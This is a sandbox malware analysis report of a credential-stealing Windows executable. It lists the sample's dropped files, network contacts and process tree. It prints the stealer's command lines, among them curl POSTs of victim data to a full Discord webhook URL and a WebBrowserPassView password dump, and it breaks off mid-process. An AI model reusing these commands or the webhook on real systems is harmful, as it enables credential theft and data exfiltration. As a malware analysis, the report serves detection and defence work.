DYNAMIC ANALYSIS REPORT #928218
Classifications: PUA Spyware
App/Generic-JJ Gen:Variant.Razy.680050 Gen:Variant.Agentus.62 MALICIOUS Threat Names: Gen:Application.Heur.yq0@kibVd8eO
Verdict Reason: -
Sample Type Windows Exe (x86-32)
Sample Name Project_Genocide_V5.1.1-.exe
ID #303998
MD5 2f0909140e6006b3682bf2de804021e9
SHA1 eb9a6c6152d25c53a7a6098280e1be2dcc7146c7
SHA256 129fd5ce9840c318148335527b70b1a6b8df1e1c0005f24d06b28130df7ed056
File Size 13847.00 KB
Report Created 2021-03-23 13:29 (UTC+1)
Target Environment win10_64_th2_en_mso2016 | exe
X-Ray Vision for Malware - www.vmray.com 1 / 55 DYNAMIC ANALYSIS REPORT #928218
OVERVIEW
VMRay Threat Identifiers (22 rules, 53 matches)
Score Category Operation Count Classification
5/5 Data Collection Tries to read cached credentials of various applications 1 Spyware
• Tries to read sensitive data of: Opera, Mozilla Firefox, Internet Explorer, Yandex Browser, Vivaldi, SeaMonkey, Internet Explorer / Edge, Safari.
4/5 Antivirus Malicious content was detected by heuristic scan 2 -
• Built-in AV detected the sample itself as "Gen:Variant.Razy.680050".
• Built-in AV detected the dropped file C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe as "Gen:Variant.Agentus.62".
2/5 Data Collection Reads sensitive browser data 8 -
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by registry.
• (Process #13) webbrowserpassview.exe tries to read credentials of web browser "Internet Explorer" by reading from the system's credential vault.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Mozilla Firefox" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Yandex Browser" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Vivaldi" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Safari" by file.
• (Process #13) webbrowserpassview.exe tries to read sensitive data of web browser "Opera" by file.
2/5 Data Collection Reads sensitive application data 1 -
• (Process #13) webbrowserpassview.exe tries to read sensitive data of application "SeaMonkey" by file.
2/5 Discovery Executes WMI query 3 -
• (Process #32) wmic.exe executes WMI query: SELECT Size FROM Win32_DiskDrive.
• (Process #35) wmic.exe executes WMI query: SELECT SerialNumber FROM Win32_BIOS.
• (Process #36) wmic.exe executes WMI query: SELECT Name FROM WIN32_PROCESSOR.
2/5 Discovery Collects hardware properties 2 -
• (Process #32) wmic.exe queries hardware properties via WMI.
• (Process #36) wmic.exe queries hardware properties via WMI.
2/5 Discovery Collects BIOS properties 1 -
• (Process #35) wmic.exe queries BIOS properties via WMI.
2/5 Network Connection Sets up server that accepts incoming connections 3 -
• (Process #11) curl.exe starts a TCP server listening on localhost port 49720.
• (Process #12) curl.exe starts a TCP server listening on localhost port 49725.
• (Process #37) curl.exe starts a TCP server listening on localhost port 49720.
2/5 Reputation Known suspicious file 1 PUA
• Reputation analysis labels file "C:\temp\WebBrowserPassView.exe" as "App/Generic-JJ".
2/5 Antivirus Suspicious content was detected by heuristic scan 1 -
• Built-in AV detected the dropped file C:\temp\WebBrowserPassView.exe as "Gen:Application.Heur.yq0@kibVd8eO".
2/5 YARA Suspicious content matched by YARA rules 1 -
X-Ray Vision for Malware - www.vmray.com 2 / 55 DYNAMIC ANALYSIS REPORT #928218
• Rule "PowerShell_Registry_Commands" from ruleset "Generic" has matched on the dropped file "C:\temp\finalres.vbs".
1/5 Privilege Escalation Enables process privilege 4 -
• (Process #2) khaaksqr.exe enables process privilege "SeDebugPrivilege".
• (Process #32) wmic.exe enables process privilege "SeDebugPrivilege".
• (Process #35) wmic.exe enables process privilege "SeDebugPrivilege".
• (Process #36) wmic.exe enables process privilege "SeDebugPrivilege".
1/5 Discovery Reads system data 1 Spyware
• (Process #7) wscript.exe reads Windows license key from registry.
1/5 Hide Tracks Creates process with hidden window 1 -
• (Process #8) wscript.exe starts (process #8) wscript.exe with a hidden window.
1/5 Discovery Enumerates running processes 1 -
• (Process #13) webbrowserpassview.exe enumerates running processes.
1/5 Discovery Possibly does reconnaissance 2 -
• (Process #13) webbrowserpassview.exe tries to gather information about application "Mozilla Firefox" by file.
• (Process #13) webbrowserpassview.exe tries to gather information about application "SeaMonkey" by file.
1/5 Network Connection Performs DNS request 6 -
• (Process #2) khaaksqr.exe resolves host name "cdn.discordapp.com" to IP "162.159.130.233".
• (Process #2) khaaksqr.exe resolves host name "raw.githubusercontent.com" to IP "185.199.109.133".
• (Process #2) khaaksqr.exe resolves host name "github.com" to IP "140.82.121.4".
• (Process #11) curl.exe resolves host name "discordapp.com" to IP "162.159.130.233".
• (Process #12) curl.exe resolves host name "myexternalip.com" to IP "216.239.34.21".
• (Process #37) curl.exe resolves host name "discordapp.com" to IP "162.159.130.233".
1/5 Network Connection Connects to remote host 6 -
• (Process #2) khaaksqr.exe opens an outgoing TCP connection to host "185.199.109.133:443".
• (Process #2) khaaksqr.exe opens an outgoing TCP connection to host "162.159.130.233:443".
• (Process #2) khaaksqr.exe opens an outgoing TCP connection to host "140.82.121.4:443".
• (Process #11) curl.exe opens an outgoing TCP connection to host "162.159.130.233:443".
• (Process #12) curl.exe opens an outgoing TCP connection to host "216.239.34.21:443".
• (Process #37) curl.exe opens an outgoing TCP connection to host "162.159.130.233:443".
1/5 Crash A monitored process crashed 1 -
• (Process #38) filed.exe crashed.
1/5 Obfuscation Resolves API functions dynamically 1 -
• (Process #13) webbrowserpassview.exe resolves 38 API functions by name.
1/5 Execution Drops PE file 3 -
• (Process #1) project_genocide_v5.1.1-.exe drops file "C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe".
• (Process #2) khaaksqr.exe drops file "C:\temp\WebBrowserPassView.exe".
• (Process #2) khaaksqr.exe drops file "C:\temp\curl.exe".
1/5 Execution Executes dropped PE file 3 -
X-Ray Vision for Malware - www.vmray.com 3 / 55 DYNAMIC ANALYSIS REPORT #928218
• Executes dropped file "C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe".
• Executes dropped file "C:\temp\WebBrowserPassView.exe".
• Executes dropped file "C:\temp\curl.exe".
- Trusted Known clean file 2 -
• File "C:\temp\curl-ca-bundle.crt" is a known clean file.
• File "C:/temp/RDhJ0CNFevzX_Passwords.txt" is a known clean file.
X-Ray Vision for Malware - www.vmray.com 4 / 55 DYNAMIC ANALYSIS REPORT #928218
Mitre ATT&CK Matrix
Command Initial Privilege Defense Credential Lateral Execution Persistence Discovery Collection and Exfiltration Impact Access Escalation Evasion Access Movement Control
#T1082 System ------Information Discovery
#T1012 ------Query - - - - - Registry
#T1143 - - - - Hidden ------Window
#T1119 ------Automated - - - Collection
#T1081 - - - - - Credentials ------in Files
#T1083 File and ------Directory Discovery
#T1005 Data ------from Local - - - System
#T1057 ------Process - - - - - Discovery
#T1214 - - - - - Credentials ------in Registry
#T1217 Browser ------Bookmark Discovery
#T1003 - - - - - Credential ------Dumping
#T1047 Windows - Management ------Instrumentati on
#T1045 - - - - Software ------Packing
X-Ray Vision for Malware - www.vmray.com 5 / 55 DYNAMIC ANALYSIS REPORT #928218
Sample Information
ID 928218
MD5 2f0909140e6006b3682bf2de804021e9
SHA1 eb9a6c6152d25c53a7a6098280e1be2dcc7146c7
SHA256 129fd5ce9840c318148335527b70b1a6b8df1e1c0005f24d06b28130df7ed056
SSDeep 393216:8wM8oimwZaeuQs+UbbjIMzXTTPBrX3aNl4C:8whTZNuQMs8TTB7KNl9
ImpHash f34d5f2d4577ed6d9ceec516c1f5a744
Filename Project_Genocide_V5.1.1-.exe
File Size 13847.00 KB
Sample Type Windows Exe (x86-32)
Has Macros
Analysis Information
Creation Time 2021-03-23 13:29 (UTC+1)
Analysis Duration 00:04:00
Termination Reason Timeout
Number of Monitored Processes 33
Execution Successfull False
Reputation Analysis Enabled
WHOIS Enabled
Built-in AV Enabled
Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of AV Matches 3
YARA Enabled
YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of YARA Matches 1
X-Ray Vision for Malware - www.vmray.com 6 / 55 DYNAMIC ANALYSIS REPORT #928218
X-Ray Vision for Malware - www.vmray.com 7 / 55 DYNAMIC ANALYSIS REPORT #928218
Screenshots trunkated.
X-Ray Vision for Malware - www.vmray.com 8 / 55 DYNAMIC ANALYSIS REPORT #928218
NETWORK
General
7.34 KB total sent
2301.81 KB total received
7 ports 49737, 49739, 49720, 49722, 443, 49725, 49727
6 contacted IP addresses
2 URLs extracted
0 files downloaded
0 malicious hosts detected
DNS
6 DNS requests for 5 domains
1 nameservers contacted
0 total requests returned errors
HTTP/S
0 URLs contacted, 2 servers
3 sessions, 2.98 KB sent, 2290.18 KB recivied
DNS Requests
Type Hostname Response Code Resolved IPs CNames Verdict
162.159.130.233, 162.159.133.233, A cdn.discordapp.com NoError 162.159.135.233, N/A 162.159.129.233, 162.159.134.233
185.199.109.133, 185.199.108.133, A raw.githubusercontent.com NoError N/A 185.199.111.133, 185.199.110.133
A github.com NoError 140.82.121.4 N/A
162.159.130.233, 162.159.135.233, A discordapp.com NoError 162.159.133.233, N/A 162.159.129.233, 162.159.134.233
216.239.34.21, 216.239.32.21, A myexternalip.com NoError N/A 216.239.36.21, 216.239.38.21
HTTP Requests
Method URL Dest. IP Dest. Port Status Code Response Size Verdict
https://discordapp.com/ api/webhooks/ 823564721483284501/ - QMQntkAnLImKnVmntN 0 bytes N/A AKBfD7Snborid4Jzdex0 GecVGObxNacU_ZS1T _PVgEGH6wfq6T
https:// - 0 bytes N/A myexternalip.com/raw
X-Ray Vision for Malware - www.vmray.com 9 / 55 DYNAMIC ANALYSIS REPORT #928218
BEHAVIOR
Process Graph
#11 curl.exe Child Process
#12 curl.exe Child Process
#13 webbrowserpassview.exe Child Process
#14 systeminfo.exe Child Process
#15 findstr.exe Child Process
#18 systeminfo.exe Child Process
#19 findstr.exe Child Process
#20 systeminfo.exe
Child Process
#21 findstr.exe
Child Process
#22 systeminfo.exe
Child Process
#23 findstr.exe
Child Process
#24 systeminfo.exe Child Process
#2 Child Process #7 Child Process #8 Child Process #9 Child Process #25 khaaksqr.exe wscript.exe wscript.exe cmd.exe findstr.exe Child Process Child Process
#1 Sample Start project_genocide_v5.1.1-.exe RPC Server Child Process #3 #26 openwith.exe systeminfo.exe
Child Process
#27 findstr.exe
Child Process
#28 systeminfo.exe
Child Process #29 findstr.exe
Child Process #30 systeminfo.exe
Child Process #31 findstr.exe
Child Process #32 wmic.exe
Child Process #35 wmic.exe
Child Process #36 wmic.exe
Child Process #37 curl.exe
#39 Child Process werfault.exe Child Process #38 filed.exe Child Process
#40 filed.exe
#42 timeout.exe
X-Ray Vision for Malware - www.vmray.com 10 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #1: project_genocide_v5.1.1-.exe
ID 1
Filename c:\users\rdhj0cnfevzx\desktop\project_genocide_v5.1.1-.exe
Command Line "C:\Users\RDhJ0CNFevzX\Desktop\Project_Genocide_V5.1.1-.exe"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 73164, Reason: Analysis Target
Unmonitor End Time End Time: 141669, Reason: Terminated
Monitor Duration 68.50s
Return Code 0
PID 1440
Parent PID 2104
Bitness 64 Bit
Dropped Files (2)
Filename File Size SHA256 YARA Match
C: d4bde482cc419f200f9f3a2fb284f3ead1ed3c5 \Users\RDhJ0CNFevzX\AppData\Local\Temp 10.00 KB fe9e8581dbe4acbce68f8b11e \Khaaksqr.exe
C: 7001466b051e89556abb7f438c9b9cafba66a \Users\RDhJ0CNFevzX\AppData\Local\Temp 10240.00 KB 5d121de17082bd6423b7333e3aa \Jmbwoud.rar
Host Behavior
Type Count
Module 18
System 3
Window 3
Registry 3
File 9
Process 2
X-Ray Vision for Malware - www.vmray.com 11 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #2: khaaksqr.exe
ID 2
Filename c:\users\rdhj0cnfevzx\appdata\local\temp\khaaksqr.exe
Command Line "C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 117521, Reason: Child Process
Unmonitor End Time End Time: 155737, Reason: Terminated
Monitor Duration 38.22s
Return Code 0
PID 3668
Parent PID 1440
Bitness 64 Bit
Dropped Files (6)
Filename File Size SHA256 YARA Match
32bc4c92173d817cb245c95505b26304e3c24 C:\temp\finalres.bat 3.93 KB 2ab1ba77bcce003727e6edecb29
f76ba0c9cc7614a11a7e1217e2e738196d6da C:\temp\finalres.vbs 2.21 KB 56dec9c96f90a8a64d9f80a4493
04084885435b6134e792c03f8b52bf6ea7135 C:\temp\finalres2.vbs 344 bytes c7bd7ff8d3cc3aaedae2c667dae
f999357a17e672e87fbed66d14ba2bebd6fb04 C:\temp\WebBrowserPassView.exe 391.50 KB e058a1aae0f0fdc49a797f58fe
2782f0f8e89c786f40240fc1916677be660fb8d C:\temp\curl-ca-bundle.crt 216.96 KB 8e25dede50c9f6f7b0c2c2178
2bbd7b9dd041c4d84a451033b257d7db2f23e C:\temp\curl.exe 4256.62 KB 6475f2e5d6e085e2e6f89043338
Host Behavior
Type Count
File 420
System 12
Process 1
Registry 27
- 10
Environment 8
Module 7
User 1
Network Behavior
Type Count
DNS 3
TCP 3
X-Ray Vision for Malware - www.vmray.com 12 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #3: openwith.exe
ID 3
Filename c:\windows\system32\openwith.exe
Command Line C:\Windows\system32\OpenWith.exe -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 122651, Reason: RPC Server
Unmonitor End Time End Time: 260366, Reason: Terminated
Monitor Duration 137.72s
Return Code 0
PID 852
Parent PID 636
Bitness 64 Bit
Host Behavior
Type Count
COM 1
X-Ray Vision for Malware - www.vmray.com 13 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #7: wscript.exe
ID 7
Filename c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 150278, Reason: Child Process
Unmonitor End Time End Time: 156691, Reason: Terminated
Monitor Duration 6.41s
Return Code 0
PID 2404
Parent PID 3668
Bitness 64 Bit
Dropped Files (1)
Filename File Size SHA256 YARA Match
9313c411f761f8215e7e73f7dc3486f5d10b85 C:\temp\WindowsInfo.txt 113 bytes 56a1164c3277791e312a80b686
Host Behavior
Type Count
System 6
Module 20
COM 8
File 4
Registry 9
Process 1
X-Ray Vision for Malware - www.vmray.com 14 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #8: wscript.exe
ID 8
Filename c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 154806, Reason: Child Process
Unmonitor End Time End Time: 158082, Reason: Terminated
Monitor Duration 3.28s
Return Code 0
PID 2512
Parent PID 2404
Bitness 64 Bit
Host Behavior
Type Count
System 6
Module 14
COM 6
File 4
Process 1
X-Ray Vision for Malware - www.vmray.com 15 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #9: cmd.exe
ID 9
Filename c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 155960, Reason: Child Process
Unmonitor End Time End Time: 269129, Reason: Terminated
Monitor Duration 113.17s
Return Code 1
PID 4936
Parent PID 2512
Bitness 64 Bit
Dropped Files (2)
Filename File Size SHA256 YARA Match
fd41cd2f48623ceb8d6d4fa774c80efa5c3f22c C:\temp\ip_address.txt 12 bytes 94bfd7a7c59543772b585d9a1
05925f6e122be36382458c1668c4b40c16809 C:\temp\System_INFO.txt 678 bytes b3e2ad5e65fde35f9ad52cef072
Host Behavior
Type Count
Module 1
File 899
Environment 206
Process 25
- 1
System 2
X-Ray Vision for Malware - www.vmray.com 16 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #11: curl.exe
ID 11
Filename c:\temp\curl.exe
C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**INJECTION STARTED!**\"}" https://discordapp.com/api/webhooks/ Command Line 823564721483284501/QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 159008, Reason: Child Process
Unmonitor End Time End Time: 162988, Reason: Terminated
Monitor Duration 3.98s
Return Code 0
PID 1124
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Environment 21
File 13
Module 14
System 134
Network Behavior
Type Count
DNS 1
TCP 3
X-Ray Vision for Malware - www.vmray.com 17 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #12: curl.exe
ID 12
Filename c:\temp\curl.exe
Command Line C:/temp/curl "https://myexternalip.com/raw"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 162019, Reason: Child Process
Unmonitor End Time End Time: 166972, Reason: Terminated
Monitor Duration 4.95s
Return Code 0
PID 5080
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Environment 20
File 567
Module 14
System 76
Network Behavior
Type Count
DNS 1
TCP 3
X-Ray Vision for Malware - www.vmray.com 18 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #13: webbrowserpassview.exe
ID 13
Filename c:\temp\webbrowserpassview.exe
Command Line C:/temp/WebBrowserPassView.exe /stext "C:/temp/RDhJ0CNFevzX_Passwords.txt"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 163742, Reason: Child Process
Unmonitor End Time End Time: 210549, Reason: Terminated
Monitor Duration 46.81s
Return Code 0
PID 3432
Parent PID 4936
Bitness 32 Bit
Dropped Files (1)
Filename File Size SHA256 YARA Match
b3d510ef04275ca8e698e5b3cbb0ece3949ef C:/temp/RDhJ0CNFevzX_Passwords.txt 2 bytes 9252f0cdc839e9ee347409a2209
Host Behavior
Type Count
Module 288
System 6
File 16
- 30
Process 446
Registry 1
X-Ray Vision for Malware - www.vmray.com 19 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #14: systeminfo.exe
ID 14
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 186721, Reason: Child Process
Unmonitor End Time End Time: 216942, Reason: Terminated
Monitor Duration 30.22s
Return Code 0
PID 3608
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 20 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #15: findstr.exe
ID 15
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"Host Name"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 194852, Reason: Child Process
Unmonitor End Time End Time: 216710, Reason: Terminated
Monitor Duration 21.86s
Return Code 0
PID 1852
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 21 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #18: systeminfo.exe
ID 18
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 215967, Reason: Child Process
Unmonitor End Time End Time: 219276, Reason: Terminated
Monitor Duration 3.31s
Return Code 0
PID 3016
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 22 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #19: findstr.exe
ID 19
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"Domain"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 216016, Reason: Child Process
Unmonitor End Time End Time: 220142, Reason: Terminated
Monitor Duration 4.13s
Return Code 0
PID 4120
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 23 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #20: systeminfo.exe
ID 20
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 218466, Reason: Child Process
Unmonitor End Time End Time: 221953, Reason: Terminated
Monitor Duration 3.49s
Return Code 0
PID 4204
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 24 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #21: findstr.exe
ID 21
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"OS Name"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 218580, Reason: Child Process
Unmonitor End Time End Time: 222054, Reason: Terminated
Monitor Duration 3.47s
Return Code 0
PID 4244
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 25 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #22: systeminfo.exe
ID 22
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 221064, Reason: Child Process
Unmonitor End Time End Time: 224559, Reason: Terminated
Monitor Duration 3.50s
Return Code 0
PID 4312
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 26 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #23: findstr.exe
ID 23
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"OS Version"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 221276, Reason: Child Process
Unmonitor End Time End Time: 224565, Reason: Terminated
Monitor Duration 3.29s
Return Code 0
PID 4360
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 27 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #24: systeminfo.exe
ID 24
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 224027, Reason: Child Process
Unmonitor End Time End Time: 227288, Reason: Terminated
Monitor Duration 3.26s
Return Code 0
PID 4476
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 28 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #25: findstr.exe
ID 25
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"System Manufacturer"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 224203, Reason: Child Process
Unmonitor End Time End Time: 227556, Reason: Terminated
Monitor Duration 3.35s
Return Code 0
PID 4520
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 29 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #26: systeminfo.exe
ID 26
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 226145, Reason: Child Process
Unmonitor End Time End Time: 229294, Reason: Terminated
Monitor Duration 3.15s
Return Code 0
PID 4764
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 30 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #27: findstr.exe
ID 27
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"System Model"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 226289, Reason: Child Process
Unmonitor End Time End Time: 229312, Reason: Terminated
Monitor Duration 3.02s
Return Code 0
PID 4812
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 31 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #28: systeminfo.exe
ID 28
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 228326, Reason: Child Process
Unmonitor End Time End Time: 231578, Reason: Terminated
Monitor Duration 3.25s
Return Code 0
PID 4916
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 32 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #29: findstr.exe
ID 29
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"System type"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 228450, Reason: Child Process
Unmonitor End Time End Time: 231582, Reason: Terminated
Monitor Duration 3.13s
Return Code 1
PID 3832
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 33 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #30: systeminfo.exe
ID 30
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 230598, Reason: Child Process
Unmonitor End Time End Time: 234305, Reason: Terminated
Monitor Duration 3.71s
Return Code 0
PID 2288
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 34 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #31: findstr.exe
ID 31
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"Total Physical Memory"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 230775, Reason: Child Process
Unmonitor End Time End Time: 234310, Reason: Terminated
Monitor Duration 3.54s
Return Code 0
PID 3332
Parent PID 4936
Bitness 64 Bit
X-Ray Vision for Malware - www.vmray.com 35 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #32: wmic.exe
ID 32
Filename c:\windows\system32\wbem\wmic.exe
Command Line wmic diskdrive get size
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 233309, Reason: Child Process
Unmonitor End Time End Time: 237008, Reason: Terminated
Monitor Duration 3.70s
Return Code 0
PID 1320
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Module 10
COM 10
System 8
Registry 5
File 9
- 1
X-Ray Vision for Malware - www.vmray.com 36 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #35: wmic.exe
ID 35
Filename c:\windows\system32\wbem\wmic.exe
Command Line wmic bios get serialnumber
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 235584, Reason: Child Process
Unmonitor End Time End Time: 237898, Reason: Terminated
Monitor Duration 2.31s
Return Code 0
PID 4944
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Module 10
COM 10
System 8
Registry 5
File 9
- 1
X-Ray Vision for Malware - www.vmray.com 37 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #36: wmic.exe
ID 36
Filename c:\windows\system32\wbem\wmic.exe
Command Line wmic cpu get name
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 236967, Reason: Child Process
Unmonitor End Time End Time: 239351, Reason: Terminated
Monitor Duration 2.38s
Return Code 0
PID 3020
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Module 10
COM 10
System 8
Registry 5
File 9
- 1
X-Ray Vision for Malware - www.vmray.com 38 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #37: curl.exe
ID 37
Filename c:\temp\curl.exe
C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**RDhJ0CNFevzX**\n```asciidoc\nTime and Date :: ...... n\"}" https:// Command Line discordapp.com/api/webhooks/823564721483284501/QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 238414, Reason: Child Process
Unmonitor End Time End Time: 240999, Reason: Terminated
Monitor Duration 2.58s
Return Code 0
PID 1056
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Environment 21
File 13
Module 14
System 101
Network Behavior
Type Count
DNS 1
TCP 3
X-Ray Vision for Malware - www.vmray.com 39 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #38: filed.exe
ID 38
Filename c:\temp\filed.exe
Command Line "C:\temp\filed.exe" --processStart filed.exe
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 239769, Reason: Child Process
Unmonitor End Time End Time: 263598, Reason: Crashed
Monitor Duration 23.83s
Return Code 3762504530
PID 1428
Parent PID 4936
Bitness 32 Bit
X-Ray Vision for Malware - www.vmray.com 40 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #39: werfault.exe
ID 39
Filename c:\windows\syswow64\werfault.exe
Command Line C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 692
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 246960, Reason: Child Process
Unmonitor End Time End Time: 263478, Reason: Terminated
Monitor Duration 16.52s
Return Code 0
PID 2268
Parent PID 1428
Bitness 32 Bit
Host Behavior
Type Count
Module 69
Environment 21
File 3
Registry 30
X-Ray Vision for Malware - www.vmray.com 41 / 55 DYNAMIC ANALYSIS REPORT #928218
Process #40: filed.exe
ID 40
Filename c:\temp\filed.exe
Command Line "C:\temp\filed.exe" --processStart filed.exe
Initial Working Directory C:\Windows\
Monitor Start Time Start Time: 249637, Reason: Child Process
Unmonitor End Time End Time: 262905, Reason: Terminated
